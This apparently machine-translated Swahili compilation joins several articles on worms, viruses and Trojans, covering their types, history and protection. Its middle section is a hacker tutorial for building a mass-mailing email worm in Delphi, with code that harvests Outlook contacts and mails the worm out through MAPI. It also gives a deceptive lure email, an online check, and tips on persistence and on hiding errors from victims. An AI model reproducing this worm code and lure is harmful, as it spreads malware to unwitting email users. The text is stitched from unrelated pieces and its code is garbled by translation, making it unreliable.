Njia kuu ambayo minyoo hutofautiana kutoka kwa kila mmoja ni jinsi mdudu huenea. Ishara nyingine za tofauti ni mbinu za kuzindua nakala ya mdudu kwenye kompyuta iliyoambukizwa, mbinu za kuanzishwa kwa mfumo, pamoja na polymorphism, siri na sifa nyingine za asili katika aina nyingine za programu mbaya (virusi na Trojans).

Aina za minyoo

Kulingana na njia ya kupenya mfumo wa uendeshaji, minyoo imegawanywa katika:

• Minyoo ya barua(Mail-Worm) - minyoo ambayo huenea katika muundo wa ujumbe wa barua pepe. Katika hali hii, mdudu hutuma nakala yake yenyewe kama kiambatisho kwa barua pepe, au kiungo kwa faili yake iliyo kwenye rasilimali fulani ya mtandao (kwa mfano, URL kwa faili iliyoambukizwa iliyo kwenye tovuti ya hacker au hacker). Katika kesi ya kwanza, msimbo wa minyoo umeanzishwa wakati kiambatisho kilichoambukizwa kinafunguliwa (kilichozinduliwa), kwa pili - wakati kiungo cha faili iliyoambukizwa kinafunguliwa. Katika hali zote mbili, athari ni sawa - msimbo wa minyoo umeanzishwa.
• IM minyoo(IM-Worm) - minyoo wanaotumia wajumbe wa mtandao. Minyoo ya kompyuta inayojulikana ya aina hii hutumia njia pekee ya uenezaji - kutuma ujumbe kwa anwani zilizotambuliwa (kutoka kwa orodha ya anwani) iliyo na URL hadi faili iliyo kwenye seva fulani ya wavuti. Mbinu hii karibu inaiga kabisa njia sawa ya utumaji barua inayotumiwa na wadudu wa barua.
• P2P minyoo(P2P-Worm) - minyoo ambayo huenea kwa kutumia mitandao ya kushiriki faili-rika-kwa-rika. Utaratibu wa uendeshaji wa wengi wa minyoo hii ni rahisi sana - kupenya mtandao wa P2P, mdudu anahitaji tu kujinakili kwenye saraka ya kugawana faili, ambayo kawaida iko kwenye mashine ya ndani. Mtandao wa P2P unashughulikia kazi yote ya kueneza virusi - wakati wa kutafuta faili kwenye mtandao, itawajulisha watumiaji wa mbali kuhusu faili hii na kutoa huduma zote muhimu za kupakua faili kutoka kwa kompyuta iliyoambukizwa. Kuna minyoo changamano zaidi ya P2P ambayo huiga itifaki ya mtandao ya mfumo maalum wa kushiriki faili na kujibu vyema maombi ya utafutaji - huku mnyoo akitoa nakala yake kwa ajili ya kupakua.
• Minyoo katika chaneli za IRC(IRC-Worm). Aina hii ya minyoo, kama vile minyoo ya barua pepe, ina njia mbili za kueneza minyoo kupitia chaneli za IRC, ikirudia mbinu zilizoelezwa hapo juu. Ya kwanza inahusisha kutuma URL kwa nakala ya mdudu. Njia ya pili ni kutuma faili iliyoambukizwa kwa mtumiaji fulani wa mtandao. Katika kesi hii, mtumiaji aliyeshambuliwa lazima athibitishe kupokea faili, kisha uihifadhi kwenye diski na kuifungua (kuiendesha kwa utekelezaji).
• Minyoo ya mtandao(Net-Worm) - minyoo mingine ya mtandao, kati ya ambayo inafanya akili kutofautisha minyoo ya mtandao na minyoo ya LAN.
  • Minyoo ya mtandao- minyoo wanaotumia itifaki za mtandao kueneza. Mara nyingi, aina hii ya minyoo huenea kwa kutumia usindikaji usio sahihi wa pakiti za msingi za safu ya itifaki ya TCP/IP na baadhi ya programu.
  • LAN minyoo- minyoo inayoenea kupitia itifaki za mtandao wa ndani

Kimsingi, watu wote huita aina yoyote ya programu hasidi kama "Virusi vya Kompyuta", lakini kwa kweli hii sio kweli kabisa. Kuna aina nyingi za programu hasidi, ikiwa ni pamoja na virusi, Trojans na minyoo, na kila aina ina tabia yake na huenea tofauti.

Badala ya jina "virusi vya kompyuta," ni sahihi zaidi kutumia "programu hasidi," kwa sababu Virusi vya kompyuta ni aina nyingine tu ya programu hasidi, kama Trojan au mdudu. Kwa hivyo ikiwa unataka neno la jumla kwa programu zisizohitajika na mbaya, basi tumia neno programu hasidi. Lakini programu za kuzuia virusi hazijali programu hasidi inaitwaje au ni aina gani - zinaweza kuondoa Trojans, virusi, minyoo na aina zingine za programu hasidi. Lakini katika nakala hii hatutazungumza juu ya programu za antivirus; tutakuambia juu ya aina kuu za programu hasidi, ambayo ni, virusi, Trojan na minyoo ni nini, na ni tofauti gani kati yao.

Virusi vya kompyuta huambukiza faili na programu zingine, kama vile virusi vya kibaolojia huambukiza chembe hai. Mara nyingi, virusi huambukiza faili na ugani wa .exe, hivyo kwa wenyewe, tu kuwa katika kumbukumbu ya gari ngumu, virusi haziwezi kuambukiza faili nyingine, lakini tu wakati faili ya .exe na virusi imezinduliwa. Kwa ufupi, ukifungua faili ya .exe iliyo na virusi, basi tu virusi itaanza kuenea.

Aina zingine za virusi vya kompyuta pia zinaweza kuambukiza aina zingine za faili, kama vile macros katika hati za Neno au Excel. Virusi kama hivyo vinaweza kuenea kupitia viambatisho vya barua pepe, vifaa vya kuhifadhi vinavyoweza kutolewa, au folda za mtandao.

Virusi vya kompyuta vinaweza kuharibu mfumo wako. Katika baadhi ya matukio, wanaweza kuchukua nafasi ya faili zilizopo za programu na wao wenyewe, badala ya kama kawaida kama faili ya ziada kwa faili zilizopo. Hii inamaanisha kuwa virusi hufuta faili zote, na hivyo kutangaza uwepo wake. Virusi pia vinaweza kuchukua kumbukumbu ya mfumo, na kusababisha ajali za mfumo.

Virusi ni hatari sana kwa sababu ... zilienea haraka sana.

Minyoo ya kompyuta ni nini?

Mnyoo (kwa Kiingereza: Worms) ni programu huru ambayo huenea bila kuingilia kati kwa mtumiaji. Ikiwa virusi huenea kwa msaada wa watumiaji wenyewe, basi minyoo hufanya hivyo kwa kujitegemea. Lakini haziambukizi faili zingine; badala yake, huunda na kusambaza nakala zao wenyewe.

Baadhi ya minyoo, kama vile mdudu maarufu wa Mydoom, ambaye ameambukiza zaidi ya kompyuta nusu milioni duniani kote, walieneza nakala zao kupitia barua pepe. Na minyoo mingine hatari na inayoeneza kwa haraka, kama vile Blaster na Sasser, hutumia udhaifu wa mtandao badala ya kutumia barua pepe. Wanasafiri kwenye mtandao na kuambukiza mifumo ya kizamani na hatarishi ambayo haina ngome.

Minyoo inayoenea kwenye mtandao inaweza kuzalisha kiasi kikubwa cha trafiki, na kupunguza kasi ya mtandao. Na baada ya kuingia kwenye mfumo, inaweza kufanya vitendo sawa na virusi vya malicious.

Trojan ni nini?

Trojans wanaitwa baada ya farasi wa hadithi ya Trojan. Ili kushinda Troy, Wagiriki walijenga farasi mkubwa wa mbao na kuwapa Trojans kama zawadi. Trojans walikubali zawadi hiyo katika jiji lao. Baadaye usiku huo, askari wa Kigiriki walitoka kwenye farasi wa mbao na kufungua milango ya jiji - na nini kilifuata, unaweza kufikiria.

Farasi wa Trojan ni kitu sawa kwenye kompyuta. Farasi wa Trojan hujificha kama programu muhimu, i.e. inajionyesha kama mpango wa kawaida na muhimu, kwa mfano, programu kama vile Russifiers, jenereta muhimu, nk. Mara tu kwenye mfumo wako, Trojan inafungua mlango wa nyuma kwenye mfumo wako i.e. mwanya (udhaifu).

Kisha, mwandishi wa Trojan hii atatumia mwanya huu kwa madhumuni yake mwenyewe. Kwa mfano, inaweza kutumia muunganisho wako wa Mtandao kwa shughuli haramu ambazo hatimaye zitakuelekeza wewe pekee. Au kupakua programu zingine mbaya, kwa ujumla, kupitia mlango huu wa nyuma mwandishi wa Trojan anaweza kufanya chochote.

Vitisho vingine

Kuna aina zingine za programu hasidi, hizi ni baadhi yao:

• Spyware- Hizi ni programu hasidi ambazo zitafuatilia vitendo vyako kwenye kompyuta. Kwa mfano, "Viweka vitufe" (viweka vitufe) vinaweza kukumbuka funguo hizo au michanganyiko ya vitufe uliyobofya na kuzituma kwa muundaji wao. Wanaweza kuiba maelezo ya kadi yako ya mkopo, nenosiri la benki mtandaoni, n.k. Spyware imeundwa kutengeneza pesa kwa muundaji wake.

• Vitisho- pia inajulikana kama programu ya ulaghai. Mara nyingi huonekana kama tahadhari bandia ya antivirus kwenye ukurasa wa wavuti. Ikiwa unaamini tahadhari na kupakua programu ya antivirus ya uwongo, baada ya kupakua programu itakujulisha kuwa kuna virusi kwenye mfumo wako na kuomba nambari ya kadi ya mkopo au kusisitiza malipo ili programu hiyo iondoe virusi. Programu itashikilia mfumo wako hadi ulipe au uondoe programu.

Daima usasishe mfumo wako wa uendeshaji na programu zingine kwenye kompyuta yako, na uwe na programu ya antivirus ili kujikinga na aina hizi za vitisho.

Je! bado una maswali juu ya mada ya virusi vya kompyuta, Trojans na aina zingine za programu hasidi? Acha maoni na tutajibu maswali yoyote ambayo unaweza kuwa nayo.

Leo nitakuelezea kanuni ya uendeshaji wa virusi vya mtandao. Mada, kama unavyoelewa, ni muhimu sana, kwani 70% ya kisanduku changu cha kibinafsi kila wakati hujazwa na virusi vya kila aina.
- kutoka kwa minyoo ndogo lakini mbaya ya VBS hadi kazi za megagramu moja na nusu za watoto wa shule ya chini :) Hawajui kuhusu kuwepo kwa WinAPI :)

Ili kupenya kompyuta, virusi vinaweza kutumia hitilafu kwenye programu ya mtumiaji (VBS+Outlook=love:)) au hitilafu kwenye kichwa cha mtumiaji. Wacha tuangalie mfano wa barua kama hiyo ya virusi:

Subj: Mapenzi
Habari! Weka utani wa baridi ambao nilikuahidi (au sio kwako, sikumbuki :)). Lakini ihifadhi hata hivyo. Usijali, kwa kweli haifomati chochote!
Usisahau kuangalia, paranoid :)
Bahati njema!
Ambatisha: fake_format.exe

Kweli, hii hapa: kila mtumiaji aliye na kilema wa Mtandao hutuma utani kila mara kwa marafiki zake, na, ipasavyo, hakumbuki ni nani aliahidi nini; ujumbe kuhusu "umbizo ghushi" hubadilisha akili za mwathiriwa kuwa vicheshi, na imani kipofu katika antivirus
- inaisha 🙂 Acha nikukumbushe kwamba algorithms niliyoelezea haijaamuliwa na wavuti yoyote, avp na wapiganaji wengine.

Kwa kifupi, mimi mwenyewe tayari nilitaka kuanza utani huu wa kuchekesha. Ninaizindua :)

Hitilafu... intel pentium 5 haijapatikana!

Oh... Haionekani kufanya kazi? Hapana, sikudhani 🙂 Kwa kweli, virusi vilihamisha mwili wake mara moja kwenye gari ngumu ya mwathiriwa, iliyosajiliwa kwa ajili ya kuanza, na sasa itaning'inia kwenye RAM (dokezo: katika jargon ya matibabu, "RAM" ni UPASUAJI WA UPASUAJI, kwa hiyo uwe mwangalifu;)) waathiriwa kulingana na kanuni niliyoeleza katika makala “Virusi vya Kujifanyia Mwenyewe.” Tu haitaangalia uzinduzi wa faili, lakini uunganisho kwenye mtandao 🙂 (katika msimbo wa chanzo hii itakuwa utaratibu wa IsOnline, hivyo kwa siku zijazo;)). Hata hivyo, wakati huo huo
hakuna anayekuzuia kufuatilia uzinduzi wa faili
- bado ni virusi, ingawa ni virusi vya mtandao. Kwa hiyo, nitajumuisha utaratibu wa InfectFile katika mantiki. Kwa hivyo tutatumia kazi na taratibu zifuatazo:

ISONLINE - kuangalia muunganisho wa Mtandao
SENDVIRUS - nadhani mara tatu 😉
GETMAILS - pata anwani kutoka kwa Outglitch's AddressesBook
MAAmbukizo - 🙂
WORKMEMORY - karibu sawa na katika makala iliyopita, lakini kwa marekebisho.

CODING

Kabla ya kuanza kwa coding halisi, wakati huu mengi ya caresses ya awali itakuwa muhimu :) Nitaelezea kwa nini: kusoma kitabu cha anwani, tutafikia Outlook kupitia interface ya interprogram, na kwa hili sio mbaya kwetu kutumia yake. aina ya maktaba. Kwa hivyo fanya: maktaba ya aina ya kuingiza mradi, na uangalie hapo... hiyo ni sawa, Outlook express v.9 au chochote ulicho nacho. Toleo la tisa linachukuliwa kuwa, ikiwa sijakosea, kutoka Office2k. Imeingizwa? "Sio kwenye orodha" inamaanisha nini? Sawa, hutokea. Tafuta wewe mwenyewe
- katika saraka na ofisi kuna faili msoutl.olb. Hili ndilo 😉 Sasa andika outlook_tlb katika sehemu ya matumizi na utaweza kufikia maeneo ya karibu zaidi katika kitabu chako cha anwani 🙂 Lo, nina shughuli nyingi leo 😉
Kwa ujumla, utaratibu wa kuweka kitabu cha anwani unapaswa kuonekana kama hii:

matumizi
ComObj, outlook_tlb,
Fomu;
….
Utaratibu PATA BARUA;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:kamba;
nambari, i: Nambari;
barua pepe: safu ya kamba;

kuanza
MSOutlook:= CreateOleObject('Outlook.Application');
MyNameSpace:= MSOutlook.GetNameSpace('MAPI');
MyFolder:=MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(barua,MyFilder.Items.Count);
kwa i:= 1 kwa MyFolder.Items.Count do
kuanza
MyItem:=MyFolder.Items[i];
barua pepe[i]:= myitem.email1addres;
mwisho;

Je, ulifurahia nilichoandika? Kweli, itazidi kuwa mbaya zaidi. Kwa sababu virusi vitatumwa kwa kutumia API safi. Na hii, kama Horrific inavyosema: "sawa na ngono ya mikono. Kuna athari katika visa vyote viwili, lakini inachukua muda mrefu kuifanikisha na hakuna buzz kama hiyo" :)
kwahiyo nimeandika nini hapa? Matumizi ya Comobj huturuhusu kufanya kazi na teknolojia ya COM; Ifuatayo, tunaunda tu kitu cha OLE Outlook na kupata orodha ya barua pepe kutoka kwayo kwa mzunguko. Ikiwa unataka kujua kitu kingine chochote
- hii pia ni kweli, soma nyaraka - zinatawala. Hata kwa Kiingereza. Orodha ya barua pepe imeandikwa kwa safu inayobadilika ya mifuatano. Itatumiwa na kazi ya SendVirus. Huyu:

kitendakazi SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i: nambari kamili;
s:kamba;
kuanza
na MapiRecipDesc ​​anza
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= hakuna;
mwisho;

na MapiFileDesc fanya kuanza
ulImehifadhiwa:= 0;
bendera:= 0;
nNafasi:= 0;
lpszPathName:= PChar(Kiambatisho);
lpszFileName:= nil;
lpFileType:= nil;
mwisho;

na MapiMessage kuanza
ulImehifadhiwa:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Somo);
lpszMessageType:= nil;
lpszDateReceived:= nil;
lpszConversationID:= nil;
bendera:= 0;
lpOriginator:= hakuna;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
ikiwa urefu(Kiambatisho)> 0 basi anza
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
mwisho mwingine kuanza
nFileCount:= 0;
lpFiles:= hakuna;
mwisho;
mwisho;

Matokeo:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
au MAPI_LOGON_UI au MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
mwisho;

Je, ulivimba wakati unasoma hii? Nenda na unywe bia, vinginevyo hutaelewa chochote.
Je, ulikunywa? Mimi pia 😉 Sawa, tuendelee. Utatumia kama hii:

Kwa i:= 1 kwa urefu (barua) kufanya
kuanza
SendVirus(",barua[i],'pricol','..');
mwisho;

Tutakuwa tukitumia matumizi ya MAPI hapa, kwa hivyo usisahau kuitangaza. Kwa kifupi, hii
- kazi ya kiwango cha chini na barua. Na kufanya kazi na barua, kama unavyojua, unahitaji kuwa na)
barua pepe ya mpokeaji b) maandishi ya barua c) kiambatisho. Hivi ndivyo ninavyofanya:
MapiRecipDesc ​​- elezea mpokeaji, MapiFileDesc - kiambatisho,
hizo. virusi vyetu, MapiMessage, ni ujumbe, basi nitaituma kwa ulimwengu mkubwa na amri ya MapiSendMail 😉 Naam, iligeuka kuwa si vigumu sana. Jambo kuu ni kuelewa kuwa rafiki yako mkubwa
- hii sio c:\porno, lakini win32.hlp :)

Tunawezaje sasa kutosheleza maneno haya yote katika mantiki kali ya virusi? Utajihesabu mwenyewe, nimekuwa nikikuambia kuhusu hili kwa makala 2 mfululizo. Na hata hivyo, niliadhimisha siku ya kuzaliwa ya mpenzi wangu jana, na sasa kichwa changu kinapiga kidogo :) Naam, sawa, hisia ya wajibu ni nguvu zaidi. Fanya tu:
Mstari wa kwanza ni kuangalia jina la faili ambapo ulianza kutoka. Kama
pricol.exe inamaanisha CopyFile kwa Windows :) Na ikiwa ulianza kutoka kwenye saraka ya Windows
- kisha angalia mara kwa mara muunganisho wako kwa mtandao wa 😉 duniani kote. Tunaangalia:

kazi IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
kuanza
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Matokeo:= (Res = 0) na (dwCount > 0);
mwisho;

Hivyo. Ikiwa kila kitu kiko sawa, basi endelea - tikisa kitabu chako cha anwani na utume barua. Kuna mbinu mbili hapa. Ikiwa jina lako
pricol.exe - mara moja angalia uunganisho. Mtumiaji anaweza kuwa anaangalia barua pepe mtandaoni. Hii itaongeza sana nafasi zetu za kupata jarida. Tayari umegundua hila ya pili mwenyewe,
yaani, katika hali niliyoelezea, utatuma barua zinazofanana kila wakati kwa mtumiaji yule yule, kwa sababu tu hakufutwa kutoka kwa kitabu cha anwani. Kwa hiyo, andika anwani zote zilizosindika kwenye faili ya logi na uangalie mara kwa mara. Hiyo inaonekana kuwa hivyo. Ingawa hapana. Usisahau kuambatanisha vipande vya msimbo vinavyokabiliwa na makosa katika kujaribu..isipokuwa. Na weka ufunguo ($ D-). Kwa sababu mtumiaji akipata hitilafu ghafla kama vile “‘FUCK’ si thamani kamili,” atashuku jambo fulani.

HITIMISHO

Nakala hii ya mwisho inahusu virusi vilivyotatuliwa kwa Windows 9x. Hivi majuzi nilitengeneza screw na kusakinisha WindowsXP Professional, kwa hivyo mifano ifuatayo itakuwa kwa ajili yake. Na unaweza tayari kununua Delphi 7 polepole, kwani nilipanda sita zangu mahali fulani, na sasa nimekaa uchi kabisa :) Nitanunua saba, ipasavyo 😉

Nakala inayofuata labda itatolewa kwa steganografia na utekelezaji wake wa vitendo.

Minyoo ya mtandao(jina lingine ni minyoo ya kompyuta) ni programu ambazo zimeundwa kwa utaratibu wa ndani wa kuenea kwenye mitandao ya kompyuta ya ndani na ya kimataifa kwa madhumuni fulani. Malengo haya ni:

• kupenya kwenye kompyuta za mbali na udhibiti wa sehemu au kamili juu yao (iliyofichwa kutoka kwa mtumiaji - mmiliki wa kompyuta hii, bila shaka);
• kuzindua nakala yako kwenye kompyuta yako;
• usambazaji zaidi kwenye mitandao yote inayopatikana, ya ndani na ya kimataifa.

Hebu tuorodhe baadhi ya aina za mitandao ambayo minyoo ya mtandao hupitishwa. Hii ni, kwanza kabisa, bila shaka, barua pepe, wajumbe mbalimbali wa mtandao wa papo hapo, kugawana faili na mitandao ya torrent, mitandao ya ndani, kubadilishana mitandao kati ya vifaa vya simu.

Minyoo ya kompyuta inasambazwa hasa katika mfumo wa faili. Zimeambatishwa kama viambatisho kwa barua pepe na ujumbe, au kwa njia mbalimbali mtumiaji anaalikwa kufuata kiungo fulani, kupakua na kuendesha kwenye kompyuta yake ya karibu programu, picha muhimu sana na isiyolipishwa, n.k. (kuna chaguzi nyingi sana za kuficha virusi vya mtandao). Ni lazima kusema kwamba barua-pepe imekuwa karibu eneo bora la kuzaliana kwa kuenea kwa minyoo ya mtandao. Na kasi ambayo wao (minyoo ya mtandao) huenea kwenye mtandao mara nyingi ni ya kushangaza tu.

Lakini pia kuna virusi vya mtandao vinavyoitwa "faili, pakiti" ambazo huenea kwa namna ya pakiti za mtandao na kupenya kompyuta kwa kutumia mashimo mbalimbali na udhaifu katika mfumo wa uendeshaji au programu iliyowekwa.

Ili kupenya kompyuta ya mbali, mbinu mbalimbali hutumiwa, kuanzia mbinu za uhandisi wa kijamii (unapopokea aina fulani ya barua inayojaribu na kiungo au faili iliyoambatanishwa, ikikuhimiza ama kufungua faili hii iliyoambatishwa au kufuata kiungo maalum), au, kama ilivyoandikwa hapo juu, kupenya huku kupitia udhaifu na milango ya nyuma katika programu inayotumiwa. Kupenya pia kunawezekana kutokana na mapungufu yaliyopo katika kupanga na matengenezo ya mtandao wa ndani (mfano itakuwa disk ya ndani iliyoshirikiwa kikamilifu na isiyolindwa).

Mbali na kazi zake kuu minyoo ya mtandao Mara nyingi pia huwa na kazi za programu zingine hasidi - virusi, Trojans, nk.

Kama takwimu za maabara za kuzuia virusi zinavyoonyesha, zaidi ya 80% ya matatizo yote yanayohusiana na kupenya kwa programu hasidi (minyoo ya mtandao, Trojans na virusi) kwenye kompyuta za ndani za watumiaji yanahusishwa na kutojua kusoma na kuandika na ukosefu wa ujuzi muhimu wa mtandao kati ya hizi. watumiaji sawa.

Wacha tuchukue safari fupi kwenye historia na tujue ni wapi na jinsi zilivyotokea, programu hizi mbaya - minyoo ya kompyuta.

Majaribio ya kwanza, wakati ambapo mifano ya kwanza ya minyoo ya kompyuta ilitumiwa, ilifanyika mwaka wa 1978 katika Kituo cha Utafiti cha Xerox huko Palo Alto. Waanzilishi wa kazi hii walikuwa John Schoch na Jon Hupp. Neno "mdudu wa mtandao" yenyewe liliibuka chini ya ushawishi wa fasihi za hadithi za kisayansi (haswa, riwaya za D. Gerrold "Wakati Harley Alikuwa na Umri wa Mwaka Mmoja" na D. Brunner "Juu ya Wimbi la Mshtuko").

Pengine mdudu maarufu wa mtandao ni yule anayeitwa "Morris Worm," ambayo iliandikwa mwaka wa 1988 na mwanafunzi wa Chuo Kikuu cha Cornell R. Morris Jr. Virusi viligonga mtandao mnamo Novemba 2, 1988, na kuenea haraka kwa idadi kubwa ya kompyuta zilizounganishwa kwenye Mtandao.

Kuna aina tofauti za minyoo ya mtandao. Kwanza kabisa, tunapaswa kutaja minyoo ya mkazi wa RAM, ambayo iko kwenye RAM ya kompyuta bila kuathiri faili kwenye gari ngumu. Kuondoa minyoo kama hiyo ya kompyuta ni rahisi sana - anzisha tena mfumo wa kufanya kazi, hii itaweka upya data kwenye RAM, na ipasavyo minyoo itafutwa. Virusi zinazokaa kwenye RAM zinajumuisha sehemu mbili: unyonyaji (au shellcode) ambayo hupenya kompyuta, na mwili wa mdudu yenyewe.

Pia kuna virusi ambazo, baada ya kupenya kwa mafanikio kwenye kompyuta, hufanya vitendo fulani na diski za ndani: wanaandika msimbo fulani wa programu huko (mfano ungekuwa kurekebisha funguo kwenye Usajili wa Windows au kusajili faili ya virusi katika Mwanzo). Pia mdudu Ikiwa inafanikiwa kupenya kompyuta, inaweza kupakua faili zozote za ziada kwa uhuru kwenye mtandao (virusi, Trojans, minyoo mingine ya mtandao) na kugeuza kompyuta yako kuwa eneo la kuzaliana kwa maambukizi yoyote ya kompyuta.

Ni ngumu sana kugundua na, ipasavyo, kugeuza minyoo hii ya mtandao. Programu za antivirus zilizo na hifadhidata zilizosasishwa za sahihi za virusi zitakusaidia kwa hili.

Wao ni aina maalum, maalum ya virusi. Mazingira ya programu hasidi ya kawaida ni mfumo wa faili, wakati minyoo hufikia vifaa vyetu kupitia mtandao. Kwa kuongeza, wanaweza kuingia kwenye PC sio tu kupitia barua pepe au mtandao, pia ni chini ya wengine.Kwa hiyo, mada ya makala hii ni minyoo ya mtandao na ulinzi dhidi yao. Baada ya yote, hupenya kupitia mitandao ya waendeshaji wa mtandao wa simu, na mitandao ya ndani ya LAN, na mitandao ya IRC kwa mazungumzo, na mitandao ya P2P iliyoundwa kwa kubadilishana faili moja kwa moja kati ya watumiaji moja kwa moja, na mitandao ya huduma zinazotumiwa kwa ujumbe wa papo hapo.

Historia kidogo ya minyoo ya mtandao

Habari ya kwanza juu ya hatua yao ilionekana mnamo 1978. Jon Hupp na John Schoch, watayarishaji programu katika Xerox, walishangaa kuhusu kukusanya na kuchakata taarifa kutoka kwa kompyuta zote hadi kwenye moja, ya kati. Baada ya muda, kila PC ya kampuni, baada ya kusindika kiasi kinachohitajika cha kazi, ilipitisha matokeo kwa programu ambayo waandaaji wa programu waliandika, na, wakati wote kuwa kwenye mtandao wa ndani, ilisindika data na kuituma katikati. kompyuta. Haraka sana marafiki walipoteza udhibiti wa programu yao na kwa muda mrefu hawakuweza kuelewa kinachoendelea.

Trafiki isiyodhibitiwa ilionekana, basi mtandao wote ulizuiwa. Baada ya kuchunguza tatizo hilo, watengeneza programu waligundua aina ya virusi, ambayo iliitwa virusi vya mtandao. Watumiaji wakubwa wa kompyuta wanapaswa pia kukumbuka w32.Blaster.worm, mdudu aliyeambukiza Windows kutoka 2000 hadi XP na kuzuia ufikiaji wa Mtandao kwa kuwasha tena kompyuta. Mnamo Novemba 1988, "Morris Worm" ilipata umaarufu, ikiambukiza 10% ya kompyuta zote za ulimwengu kutokana na makosa madogo ya mwandishi wa kanuni. Kompyuta hizi zilibaki bila kufanya kazi kwa wiki, na kusababisha uharibifu wa takriban $ 100 milioni. Kwa hivyo, mada kama vile minyoo ya mtandao na ulinzi dhidi yao ni muhimu sana na umuhimu wake huongezeka tu kwa wakati.

Aina za minyoo ya mtandao na njia zao kwenye kompyuta

Je, kazi za programu hasidi ni zipi? Zile za sekondari ni kupenya kifaa chako, kuamsha ndani yake na kuanza kuzidisha, lakini sio tu kwenye PC yako. Kwa hivyo kazi kuu - kuingia kwenye vifaa vya watu wengine kupitia mtandao. Ni nini, aina zao? Sehemu kuu ya virusi hivi ni minyoo ya barua pepe ambayo huingia kwenye kompyuta na faili iliyounganishwa na barua pepe. Mtumiaji mwenyewe anaiamsha, akijaribu kuifungua. Hii ni kweli hasa kwa wanasayansi wa kompyuta wasio na ujuzi ambao hawatambui chochote cha tuhuma katika upanuzi wa faili inayozinduliwa, kwani mara nyingi ni za uwongo tu zinaonekana.

Kwa hiyo, unapaswa kufuata daima mapendekezo ya zamani - si kujibu barua kutoka kwa watu wasiojulikana. Mara baada ya kuanzishwa, virusi vya mtandao hupata anwani za barua pepe kwenye kifaa na kuwatumia nakala ya mpendwa wao. Vivyo hivyo, minyoo "huenea" kupitia wateja wa IRC, ICQ, na wajumbe wengine sawa. Wakati mwingine huingia kwenye PC kutokana na makosa katika mfumo wa uendeshaji, programu na vivinjari. Kuna aina nyingine za minyoo ya mtandao: IRC worms, P2P worms na IM worms. Tunadhani tayari ni wazi kutoka kwa majina wanachofanya na jinsi wanavyoingia kwenye PC.

Kazi zingine za minyoo ya mtandao na ishara zao kwenye kompyuta

Kanuni ya operesheni yao ni sawa na ile ya programu hasidi zingine, kwa mfano, Baada ya kumaliza kazi yao kuu, wanaanza kufanya kazi zingine. Miongoni mwao: kusanikisha programu za kudhibiti (mbali) kompyuta iliyoambukizwa, kuiba data, kuiharibu, ambayo ni, kila kitu ambacho muumba aliwapanga kufanya.

Lakini hata bila vitendo hivi vya ziada, kiasi cha trafiki kwenye kifaa huongezeka, utendaji hupungua, na njia za mawasiliano zinapakiwa. Hii ni ishara ya wazi ya mdudu katika mfumo. Ikiwa antivirus imefungwa, basi hii ni ukweli mwingine ambao unahitaji kulipa kipaumbele. Ufikiaji wa tovuti za programu ya antivirus unaweza hata kuzuiwa.

Jinsi ya kujikinga na minyoo ya mtandao?

Tumeangalia sehemu ya kwanza ya usemi vizuri kabisa - minyoo ya mtandao na ulinzi dhidi yao, sasa wacha tuendelee kwa pili. Tungependa kukuonya mara moja kwamba antivirus ya kawaida na utendaji wa kimsingi haitakusaidia sana; bora, itagundua ukweli wa tishio na kuizuia. Lakini hii haitazuia kampuni nyingine ya programu hasidi kufikia mtandao wako tena. Lakini ikiwa PC yako imeunganishwa kwenye mtandao, antivirus nzuri ni sharti la uendeshaji wake.

Ulinzi dhidi ya minyoo ya mtandao pia imejumuishwa katika utendaji wa mfumo wa uendeshaji yenyewe. Ina zana za kufanya hivyo, ambayo, kwa kiwango cha chini, hupunguza kwa kiasi kikubwa hatari ya kuambukizwa. Ya kuu ni sasisho za OS otomatiki na firewall iliyoamilishwa / firewall. Katika ujenzi wa pirated hii mara nyingi imezimwa, ambayo inaweza kusababisha matatizo makubwa. Baada ya yote, ni firewall ambayo huangalia data zote zinazoingia kwenye kompyuta ya mtandao na kuamua ikiwa itairuhusu au la.

Ulinzi wa mtu wa tatu dhidi ya minyoo ya mtandao

Ili kuimarisha ulinzi wa kompyuta yako dhidi ya minyoo ya mtandao, wadudu wadukuzi na virusi vingine, inashauriwa usakinishe ngome ya watu wengine kama suluhu mbadala. Programu kama hizo, kwa sababu ya umakini wao mdogo, zina mipangilio rahisi zaidi. Maarufu kati ya watumiaji ni: Comodo Firewall - programu ya bure kabisa na Outpost Firewall Pro - iliyolipwa.

Ili kusasishwa kila wakati na bidhaa zote mpya katika vita dhidi ya "maambukizi" mapya, tunapendekeza ugeuke kwenye rasilimali ya ru ya orodha ya virusi. Kuna kila aina ya minyoo ya mtandao huko, kuibuka kwa mpya kunafuatiliwa, na utajua mara moja kuhusu hilo. Kwa njia, pamoja na antivirus zinazojulikana, minyoo pia huzuia upatikanaji wa rasilimali ya VirusInfo, ambayo ina huduma ya matibabu ya bure ya vifaa dhidi ya maambukizi mbalimbali.

hitimisho

Wacha tufanye muhtasari wa mzunguko mzima wa maisha ya ukuzaji wa minyoo ya mtandao katika sentensi chache:

1. Kupenya kwenye mfumo wako.
2. Jambo muhimu ni uanzishaji.
3. Tafuta wahasiriwa wanaowezekana.
4. Uzalishaji na utayarishaji wa nakala.

Usambazaji zaidi wa nakala.

Sasa fanya hitimisho lako. Tunatumahi kuwa tayari umeelewa wazi ni minyoo ya mtandao ni nini, na ulinzi dhidi yao inawezekana katika hatua ya kwanza kabisa. Kisha hakutakuwa na matatizo. Kwa hiyo linda kompyuta yako kutokana na vitisho, na hutahitaji kutumia jitihada nyingi kukabiliana na matokeo.